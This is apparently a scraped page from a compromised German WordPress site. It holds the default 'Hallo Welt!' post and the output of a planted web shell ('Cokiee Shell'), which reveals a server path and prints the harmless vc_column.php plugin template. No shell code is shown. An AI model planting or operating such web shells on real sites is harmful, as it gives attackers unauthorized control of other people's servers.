Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/plugins/js_composer/composer/shortcodes_templates/ |
Current File : //var/www/web284/html/wp-content/plugins/js_composer/composer/shortcodes_templates/vc_column.php |
<?php $output = $el_class = $width = ''; extract(shortcode_atts(array( 'el_class' => '', 'width' => '1/1' ), $atts)); $el_class = $this->getExtraClass($el_class); $width = wpb_translateColumnWidthToSpan($width); $el_class .= ' wpb_column column_container'; $css_class = apply_filters(VC_SHORTCODE_CUSTOM_CSS_FILTER_TAG, $width.$el_class, $this->settings['base']); $output .= "\n\t".'<div class="'.$css_class.'">'; $output .= "\n\t\t".'<div class="wpb_wrapper">'; $output .= "\n\t\t\t".wpb_js_remove_wpautop($content); $output .= "\n\t\t".'</div> '.$this->endBlockComment('.wpb_wrapper'); $output .= "\n\t".'</div> '.$this->endBlockComment($el_class) . "\n"; echo $output;
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare